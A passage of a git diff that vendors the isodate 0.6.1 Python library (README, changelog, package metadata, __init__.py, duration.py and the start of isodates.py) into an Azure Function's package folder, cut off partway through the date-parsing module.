classes. Additionally +fractional seconds are limited to microseconds. That means if the parser finds +for instance nanoseconds it will round it to microseconds. + +Documentation +------------- + +Currently there are four parsing methods available. + * parse_time: + parses an ISO 8601 time string into a *time* object + * parse_date: + parses an ISO 8601 date string into a *date* object + * parse_datetime: + parses an ISO 8601 date-time string into a *datetime* object + * parse_duration: + parses an ISO 8601 duration string into a *timedelta* or *Duration* + object. + * parse_tzinfo: + parses the time zone info part of an ISO 8601 string into a + *tzinfo* object. + +As ISO 8601 allows to define durations in years and months, and *timedelta* +does not handle years and months, this module provides a *Duration* class, +which can be used almost like a *timedelta* object (with some limitations). +However, a *Duration* object can be converted into a *timedelta* object. + +There are also ISO formatting methods for all supported data types. Each +*xxx_isoformat* method accepts a format parameter. The default format is +always the ISO 8601 expanded format. This is the same format used by +*datetime.isoformat*: + + * time_isoformat: + Intended to create ISO time strings with default format + *hh:mm:ssZ*. + * date_isoformat: + Intended to create ISO date strings with default format + *yyyy-mm-dd*. + * datetime_isoformat: + Intended to create ISO date-time strings with default format + *yyyy-mm-ddThh:mm:ssZ*. + * duration_isoformat: + Intended to create ISO duration strings with default format + *PnnYnnMnnDTnnHnnMnnS*. + * tz_isoformat: + Intended to create ISO time zone strings with default format + *hh:mm*. + * strftime: + A re-implementation mostly compatible with Python's *strftime*, but + supports only those format strings, which can also be used for dates + prior 1900. This method also understands how to format *datetime* and + *Duration* instances. + +Installation: +------------- + +This module can easily be installed with Python standard installation methods. + +Either use *python setup.py install* or in case you have *setuptools* or +*distribute* available, you can also use *easy_install*. + +Limitations: +------------ + + * The parser accepts several date/time representation which should be invalid + according to ISO 8601 standard. + + 1. for date and time together, this parser accepts a mixture of basic and extended format. + e.g. the date could be in basic format, while the time is accepted in extended format. + It also allows short dates and times in date-time strings. + 2. For incomplete dates, the first day is chosen. e.g. 19th century results in a date of + 1901-01-01. + 3. negative *Duration* and *timedelta* value are not fully supported yet. + +Further information: +-------------------- + +The doc strings and unit tests should provide rather detailed information about +the methods and their limitations. + +The source release provides a *setup.py* script, +which can be used to run the unit tests included. + +Source code is available at ``_. + +CHANGES +======= + +0.6.1 (2021-12-13) +------------------ + +- support python 3.10 () +- last version to support py 2.7 + + +0.6.0 (2017-10-13) +------------------ + +- support incomplete month date (Fabien Loffredo) +- rely on duck typing when doing duration maths +- support ':' as separator in fractional time zones (usrenmae) + + +0.5.4 (2015-08-06) +------------------ + +- Fix parsing of Periods (Fabien Bochu) +- Make Duration objects hashable (Geoffrey Fairchild) +- Add multiplication to duration (Reinoud Elhorst) + + +0.5.1 (2014-11-07) +------------------ + +- fixed pickling of Duration objects +- raise ISO8601Error when there is no 'T' separator in datetime strings (Adrian Coveney) + + +0.5.0 (2014-02-23) +------------------ + +- ISO8601Error are subclasses of ValueError now (Michael Hrivnak) +- improve compatibility across various python variants and versions +- raise exceptions when using fractional years and months in date + maths with durations +- renamed method todatetime on Duraction objects to totimedelta + + +0.4.9 (2012-10-30) +------------------ + +- support pickling FixedOffset instances +- make sure parsed fractional seconds are in microseconds +- add leading zeros when formattig microseconds (Jarom Loveridge) + + +0.4.8 (2012-05-04) +------------------ + +- fixed incompatibility of unittests with python 2.5 and 2.6 (runs fine on 2.7 + and 3.2) + + +0.4.7 (2012-01-26) +------------------ + +- fixed tzinfo formatting (never pass None into tzinfo.utcoffset()) + + +0.4.6 (2012-01-06) +------------------ + +- added Python 3 compatibility via 2to3 + +0.4.5 (2012-01-06) +------------------ + +- made setuptools dependency optional + +0.4.4 (2011-04-16) +------------------ + +- Fixed formatting of microseconds for datetime objects + +0.4.3 (2010-10-29) +------------------ + +- Fixed problem with %P formating and fractions (supplied by David Brooks) + +0.4.2 (2010-10-28) +------------------ + +- Implemented unary - for Duration (supplied by David Brooks) +- Output fractional seconds with '%P' format. (partly supplied by David Brooks) + +0.4.1 (2010-10-13) +------------------ + +- fixed bug in comparison between timedelta and Duration. +- fixed precision problem with microseconds (reported by Tommi Virtanen) + +0.4.0 (2009-02-09) +------------------ + +- added method to parse ISO 8601 time zone strings +- added methods to create ISO 8601 conforming strings + +0.3.0 (2009-1-05) +------------------ + +- Initial release + +TODOs +===== + +This to do list contains some thoughts and ideas about missing features, and +parts to think about, whether to implement them or not. This list is probably +not complete. + +Missing features: +----------------- + + * time formating does not allow to create fractional representations. + * parser for ISO intervals. + * currently microseconds are always padded to a length of 6 characters. + trailing 0s should be optional + +Documentation: +-------------- + + * parse_datetime: + - complete documentation to show what this function allows, but ISO forbids. + and vice verse. + - support other separators between date and time than 'T' + + * parse_date: + - yeardigits should be always greater than 4 + - dates before 0001-01-01 are not supported + + * parse_duration: + - alternative formats are not fully supported due to parse_date restrictions + - standard duration format is fully supported but not very restrictive. + + * Duration: + - support fractional years and month in calculations + - implement w3c order relation? (``_) + - refactor to have duration mathematics only at one place. + - localize __str__ method (does timedelta do this?) + - when is a Duration negative? + - normalize Durations. months [00-12] and years ]-inf,+inf[ + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/RECORD new file mode 100644 index 0000000..22efb60 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/RECORD @@ -0,0 +1,39 @@ +isodate-0.6.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +isodate-0.6.1.dist-info/METADATA,sha256=t7C7UpZWdkeqCL5RJVeDivzIISrnb-xf3VivlJb7mC0,9603 +isodate-0.6.1.dist-info/RECORD,, +isodate-0.6.1.dist-info/WHEEL,sha256=Z-nyYpwrcSqxfdux5Mbn_DQ525iP7J2DG3JgGvOYyTQ,110 +isodate-0.6.1.dist-info/top_level.txt,sha256=JgdqaHBw0Vx74Km0xZ1-6npOUHe_6cKHSBCEx6ppVe8,8 +isodate/__init__.py,sha256=jRGDoJaMif21v3bVrIg-nTFaSRnbnDeXtL_sUhKx7Zw,4099 +isodate/__pycache__/__init__.cpython-39.pyc,, +isodate/__pycache__/duration.cpython-39.pyc,, +isodate/__pycache__/isodates.cpython-39.pyc,, +isodate/__pycache__/isodatetime.cpython-39.pyc,, +isodate/__pycache__/isoduration.cpython-39.pyc,, +isodate/__pycache__/isoerror.cpython-39.pyc,, +isodate/__pycache__/isostrf.cpython-39.pyc,, +isodate/__pycache__/isotime.cpython-39.pyc,, +isodate/__pycache__/isotzinfo.cpython-39.pyc,, +isodate/__pycache__/tzinfo.cpython-39.pyc,, +isodate/duration.py,sha256=yB_93UrtSusZeuMIllS-WB7-eS8P_6q8KHeYaWoGCq0,12532 +isodate/isodates.py,sha256=5oUl50kmeZLMCQS56OwvZsz-uEy00VbkXqzQKYNtOMg,10620 +isodate/isodatetime.py,sha256=cHn2SoEqwETg9e_zBRtjN7eRSWKD6KpHDcVxSgnXmnw,2955 +isodate/isoduration.py,sha256=UxzMJDW5A5dbFT8Sxi4uSHysAOVh8OMPOaXC7m3RMUE,6705 +isodate/isoerror.py,sha256=DeD6rysn0sqqqdTD_3X5R5mHhV5UD75r7g2KyyQPN9k,1714 +isodate/isostrf.py,sha256=pwIQqH5MLvNUtR3W0kHCb8wj4liKWpWlcvBlobad--c,9252 +isodate/isotime.py,sha256=kCuXRDizKjBzKHXfMtl82fK5f7piSV53WWDd15RjNCs,7198 +isodate/isotzinfo.py,sha256=0XT-jc3WAh0eCmfXbCNkOzrLaxStHCYF9jUWyBILWp4,4217 +isodate/tests/__init__.py,sha256=nnTKaFDY0-3DWBbeMhhIsWjMIagLdZW1YE5HlLaI-fg,2184 +isodate/tests/__pycache__/__init__.cpython-39.pyc,, +isodate/tests/__pycache__/test_date.cpython-39.pyc,, +isodate/tests/__pycache__/test_datetime.cpython-39.pyc,, +isodate/tests/__pycache__/test_duration.cpython-39.pyc,, +isodate/tests/__pycache__/test_pickle.cpython-39.pyc,, +isodate/tests/__pycache__/test_strf.cpython-39.pyc,, +isodate/tests/__pycache__/test_time.cpython-39.pyc,, +isodate/tests/test_date.py,sha256=L7dhYuYKJ-LMZw5qOjvtT0qChXIpBqZY0Mx0XbHEL28,6090 +isodate/tests/test_datetime.py,sha256=lwQsuRXlFrMeqDCR5lQ8V6vrLDZrxBVgSDCRRCOXc6Q,7387 +isodate/tests/test_duration.py,sha256=fTsyLOOx0-kjk-D6wzFutpOePrIgyu3kO58lWwyJsuI,24096 +isodate/tests/test_pickle.py,sha256=kuuRc01OKYQ5_sqZGvOF41FIc3gEgecRZM1U9HJDckQ,1845 +isodate/tests/test_strf.py,sha256=Nv4ZCXZzUNEFL8Cxgr8qe3WDv01WU7_e2ktcohHIL3s,5241 +isodate/tests/test_time.py,sha256=1KOxOOV4iTJ8UKu005dGEmBumQr3vokMK8fWK6qgpe4,6715 +isodate/tzinfo.py,sha256=dzVxjzlMDiuFiaJZT638t9b67GhZU8PAmP9-JgxcDIU,3692 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/WHEEL new file mode 100644 index 0000000..e283ba9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/WHEEL @@ -0,0 +1,6 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.36.2) +Root-Is-Purelib: true +Tag: py2-none-any +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/top_level.txt new file mode 100644 index 0000000..481cd26 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/top_level.txt @@ -0,0 +1 @@ +isodate diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__init__.py new file mode 100644 index 0000000..4b63cc4 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__init__.py @@ -0,0 +1,72 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +Import all essential functions and constants to re-export them here for easy +access. + +This module contains also various pre-defined ISO 8601 format strings. +''' +from isodate.isodates import parse_date, date_isoformat +from isodate.isotime import parse_time, time_isoformat +from isodate.isodatetime import parse_datetime, datetime_isoformat +from isodate.isoduration import parse_duration, duration_isoformat +from isodate.isoerror import ISO8601Error +from isodate.isotzinfo import parse_tzinfo, tz_isoformat +from isodate.tzinfo import UTC, FixedOffset, LOCAL +from isodate.duration import Duration +from isodate.isostrf import strftime +from isodate.isostrf import DATE_BAS_COMPLETE, DATE_BAS_ORD_COMPLETE +from isodate.isostrf import DATE_BAS_WEEK, DATE_BAS_WEEK_COMPLETE +from isodate.isostrf import DATE_CENTURY, DATE_EXT_COMPLETE +from isodate.isostrf import DATE_EXT_ORD_COMPLETE, DATE_EXT_WEEK +from isodate.isostrf import DATE_EXT_WEEK_COMPLETE, DATE_YEAR +from isodate.isostrf import DATE_BAS_MONTH, DATE_EXT_MONTH +from isodate.isostrf import TIME_BAS_COMPLETE, TIME_BAS_MINUTE +from isodate.isostrf import TIME_EXT_COMPLETE, TIME_EXT_MINUTE +from isodate.isostrf import TIME_HOUR +from isodate.isostrf import TZ_BAS, TZ_EXT, TZ_HOUR +from isodate.isostrf import DT_BAS_COMPLETE, DT_EXT_COMPLETE +from isodate.isostrf import DT_BAS_ORD_COMPLETE, DT_EXT_ORD_COMPLETE +from isodate.isostrf import DT_BAS_WEEK_COMPLETE, DT_EXT_WEEK_COMPLETE +from isodate.isostrf import D_DEFAULT, D_WEEK, D_ALT_EXT, D_ALT_BAS +from isodate.isostrf import D_ALT_BAS_ORD, D_ALT_EXT_ORD + +__all__ = ['parse_date', 'date_isoformat', 'parse_time', 'time_isoformat', + 'parse_datetime', 'datetime_isoformat', 'parse_duration', + 'duration_isoformat', 'ISO8601Error', 'parse_tzinfo', + 'tz_isoformat', 'UTC', 'FixedOffset', 'LOCAL', 'Duration', + 'strftime', 'DATE_BAS_COMPLETE', 'DATE_BAS_ORD_COMPLETE', + 'DATE_BAS_WEEK', 'DATE_BAS_WEEK_COMPLETE', 'DATE_CENTURY', + 'DATE_EXT_COMPLETE', 'DATE_EXT_ORD_COMPLETE', 'DATE_EXT_WEEK', + 'DATE_EXT_WEEK_COMPLETE', 'DATE_YEAR', + 'DATE_BAS_MONTH', 'DATE_EXT_MONTH', + 'TIME_BAS_COMPLETE', 'TIME_BAS_MINUTE', 'TIME_EXT_COMPLETE', + 'TIME_EXT_MINUTE', 'TIME_HOUR', 'TZ_BAS', 'TZ_EXT', 'TZ_HOUR', + 'DT_BAS_COMPLETE', 'DT_EXT_COMPLETE', 'DT_BAS_ORD_COMPLETE', + 'DT_EXT_ORD_COMPLETE', 'DT_BAS_WEEK_COMPLETE', + 'DT_EXT_WEEK_COMPLETE', 'D_DEFAULT', 'D_WEEK', 'D_ALT_EXT', + 'D_ALT_BAS', 'D_ALT_BAS_ORD', 'D_ALT_EXT_ORD'] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..b0f6a36 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/duration.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/duration.cpython-39.pyc new file mode 100644 index 0000000..71337a4 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/duration.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isodates.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isodates.cpython-39.pyc new file mode 100644 index 0000000..05c90c9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isodates.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isodatetime.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isodatetime.cpython-39.pyc new file mode 100644 index 0000000..310dd1b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isodatetime.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isoduration.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isoduration.cpython-39.pyc new file mode 100644 index 0000000..4f4c5fe Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isoduration.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isoerror.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isoerror.cpython-39.pyc new file mode 100644 index 0000000..0f325f4 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isoerror.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isostrf.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isostrf.cpython-39.pyc new file mode 100644 index 0000000..bbbd599 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isostrf.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isotime.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isotime.cpython-39.pyc new file mode 100644 index 0000000..4791f70 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isotime.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isotzinfo.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isotzinfo.cpython-39.pyc new file mode 100644 index 0000000..e54118c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isotzinfo.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/tzinfo.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/tzinfo.cpython-39.pyc new file mode 100644 index 0000000..222a06e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/tzinfo.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/duration.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/duration.py new file mode 100644 index 0000000..0a556c7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/duration.py @@ -0,0 +1,325 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +This module defines a Duration class. + +The class Duration allows to define durations in years and months and can be +used as limited replacement for timedelta objects. +''' +from datetime import timedelta +from decimal import Decimal, ROUND_FLOOR + + +def fquotmod(val, low, high): + ''' + A divmod function with boundaries. + + ''' + # assumes that all the maths is done with Decimals. + # divmod for Decimal uses truncate instead of floor as builtin + # divmod, so we have to do it manually here. + a, b = val - low, high - low + div = (a / b).to_integral(ROUND_FLOOR) + mod = a - div * b + # if we were not usig Decimal, it would look like this. + # div, mod = divmod(val - low, high - low) + mod += low + return int(div), mod + + +def max_days_in_month(year, month): + ''' + Determines the number of days of a specific month in a specific year. + ''' + if month in (1, 3, 5, 7, 8, 10, 12): + return 31 + if month in (4, 6, 9, 11): + return 30 + if ((year % 400) == 0) or ((year % 100) != 0) and ((year % 4) == 0): + return 29 + return 28 + + +class Duration(object): + ''' + A class which represents a duration. + + The difference to datetime.timedelta is, that this class handles also + differences given in years and months. + A Duration treats differences given in year, months separately from all + other components. + + A Duration can be used almost like any timedelta object, however there + are some restrictions: + * It is not really possible to compare Durations, because it is unclear, + whether a duration of 1 year is bigger than 365 days or not. + * Equality is only tested between the two (year, month vs. timedelta) + basic components. + + A Duration can also be converted into a datetime object, but this requires + a start date or an end date. + + The algorithm to add a duration to a date is defined at + http://www.w3.org/TR/xmlschema-2/#adding-durations-to-dateTimes + ''' + + def __init__(self, days=0, seconds=0, microseconds=0, milliseconds=0, + minutes=0, hours=0, weeks=0, months=0, years=0): + ''' + Initialise this Duration instance with the given parameters. + ''' + if not isinstance(months, Decimal): + months = Decimal(str(months)) + if not isinstance(years, Decimal): + years = Decimal(str(years)) + self.months = months + self.years = years + self.tdelta = timedelta(days, seconds, microseconds, milliseconds, + minutes, hours, weeks) + + def __getstate__(self): + return self.__dict__ + + def __setstate__(self, state): + self.__dict__.update(state) + + def __getattr__(self, name): + ''' + Provide direct access to attributes of included timedelta instance. + ''' + return getattr(self.tdelta, name) + + def __str__(self): + ''' + Return a string representation of this duration similar to timedelta. + ''' + params = [] + if self.years: + params.append('%d years' % self.years) + if self.months: + fmt = "%d months" + if self.months <= 1: + fmt = "%d month" + params.append(fmt % self.months) + params.append(str(self.tdelta)) + return ', '.join(params) + + def __repr__(self): + ''' + Return a string suitable for repr(x) calls. + ''' + return "%s.%s(%d, %d, %d, years=%d, months=%d)" % ( + self.__class__.__module__, self.__class__.__name__, + self.tdelta.days, self.tdelta.seconds, + self.tdelta.microseconds, self.years, self.months) + + def __hash__(self): + ''' + Return a hash of this instance so that it can be used in, for + example, dicts and sets. + ''' + return hash((self.tdelta, self.months, self.years)) + + def __neg__(self): + """ + A simple unary minus. + + Returns a new Duration instance with all it's negated. + """ + negduration = Duration(years=-self.years, months=-self.months) + negduration.tdelta = -self.tdelta + return negduration + + def __add__(self, other): + ''' + Durations can be added with Duration, timedelta, date and datetime + objects. + ''' + if isinstance(other, Duration): + newduration = Duration(years=self.years + other.years, + months=self.months + other.months) + newduration.tdelta = self.tdelta + other.tdelta + return newduration + try: + # try anything that looks like a date or datetime + # 'other' has attributes year, month, day + # and relies on 'timedelta + other' being implemented + if (not(float(self.years).is_integer() and + float(self.months).is_integer())): + raise ValueError('fractional years or months not supported' + ' for date calculations') + newmonth = other.month + self.months + carry, newmonth = fquotmod(newmonth, 1, 13) + newyear = other.year + self.years + carry + maxdays = max_days_in_month(newyear, newmonth) + if other.day > maxdays: + newday = maxdays + else: + newday = other.day + newdt = other.replace( + year=int(newyear), month=int(newmonth), day=int(newday) + ) + # does a timedelta + date/datetime + return self.tdelta + newdt + except AttributeError: + # other probably was not a date/datetime compatible object + pass + try: + # try if other is a timedelta + # relies on timedelta + timedelta supported + newduration = Duration(years=self.years, months=self.months) + newduration.tdelta = self.tdelta + other + return newduration + except AttributeError: + # ignore ... other probably was not a timedelta compatible object + pass + # we have tried everything .... return a NotImplemented + return NotImplemented + + __radd__ = __add__ + + def __mul__(self, other): + if isinstance(other, int): + newduration = Duration( + years=self.years * other, + months=self.months * other) + newduration.tdelta = self.tdelta * other + return newduration + return NotImplemented + + __rmul__ = __mul__ + + def __sub__(self, other): + ''' + It is possible to subtract Duration and timedelta objects from Duration + objects. + ''' + if isinstance(other, Duration): + newduration = Duration(years=self.years - other.years, + months=self.months - other.months) + newduration.tdelta = self.tdelta - other.tdelta + return newduration + try: + # do maths with our timedelta object .... + newduration = Duration(years=self.years, months=self.months) + newduration.tdelta = self.tdelta - other + return newduration + except TypeError: + # looks like timedelta - other is not implemented + pass + return NotImplemented + + def __rsub__(self, other): + ''' + It is possible to subtract Duration objecs from date, datetime and + timedelta objects. + + TODO: there is some weird behaviour in date - timedelta ... + if timedelta has seconds or microseconds set, then + date - timedelta != date + (-timedelta) + for now we follow this behaviour to avoid surprises when mixing + timedeltas with Durations, but in case this ever changes in + the stdlib we can just do: + return -self + other + instead of all the current code + ''' + if isinstance(other, timedelta): + tmpdur = Duration() + tmpdur.tdelta = other + return tmpdur - self + try: + # check if other behaves like a date/datetime object + # does it have year, month, day and replace? + if (not(float(self.years).is_integer() and + float(self.months).is_integer())): + raise ValueError('fractional years or months not supported' + ' for date calculations') + newmonth = other.month - self.months + carry, newmonth = fquotmod(newmonth, 1, 13) + newyear = other.year - self.years + carry + maxdays = max_days_in_month(newyear, newmonth) + if other.day > maxdays: + newday = maxdays + else: + newday = other.day + newdt = other.replace( + year=int(newyear), month=int(newmonth), day=int(newday) + ) + return newdt - self.tdelta + except AttributeError: + # other probably was not compatible with data/datetime + pass + return NotImplemented + + def __eq__(self, other): + ''' + If the years, month part and the timedelta part are both equal, then + the two Durations are considered equal. + ''' + if isinstance(other, Duration): + if (((self.years * 12 + self.months) == + (other.years * 12 + other.months) and + self.tdelta == other.tdelta)): + return True + return False + # check if other con be compared against timedelta object + # will raise an AssertionError when optimisation is off + if self.years == 0 and self.months == 0: + return self.tdelta == other + return False + + def __ne__(self, other): + ''' + If the years, month part or the timedelta part is not equal, then + the two Durations are considered not equal. + ''' + if isinstance(other, Duration): + if (((self.years * 12 + self.months) != + (other.years * 12 + other.months) or + self.tdelta != other.tdelta)): + return True + return False + # check if other can be compared against timedelta object + # will raise an AssertionError when optimisation is off + if self.years == 0 and self.months == 0: + return self.tdelta != other + return True + + def totimedelta(self, start=None, end=None): + ''' + Convert this duration into a timedelta object. + + This method requires a start datetime or end datetimem, but raises + an exception if both are given. + ''' + if start is None and end is None: + raise ValueError("start or end required") + if start is not None and end is not None: + raise ValueError("only start or end allowed") + if start is not None: + return (start + self) - start + return end - (end - self) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isodates.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isodates.py new file mode 100644 index 0000000..5bf4f2f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isodates.py @@ -0,0 +1,213 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +This modules provides a method to parse an ISO 8601:2004 date string to a +python datetime.date instance. + +It supports all basic, extended and expanded formats as described in the ISO +standard. The only limitations it has, are given by the Python datetime.date +implementation, which does not support dates before 0001-01-01. +''' +import re +from datetime import date, timedelta + +from isodate.isostrf import strftime, DATE_EXT_COMPLETE +from isodate.isoerror import ISO8601Error + +DATE_REGEX_CACHE = {} +# A dictionary to cache pre-compiled regular expressions. +# A set of regular expressions is identified, by number of year digits allowed +# and whether a plus/minus sign is required or not. (This option is changeable +# only for 4 digit years). + + +def build_date_regexps(yeardigits=4, expanded=False): + ''' + Compile set of regular expressions to parse ISO dates. The expressions will + be created only if they are not already in REGEX_CACHE. + + It is necessary to fix the number of year digits, else it is not possible + to automatically distinguish between various ISO date formats. + + ISO 8601 allows more than 4 digit years, on prior agreement, but then a +/- + sign is required (expanded format). To support +/- sign for 4 digit years, + the expanded parameter needs to be set to True. + ''' + if yeardigits != 4: + expanded = True + if (yeardigits, expanded) not in DATE_REGEX_CACHE: + cache_entry = [] + # ISO 8601 expanded DATE formats allow an 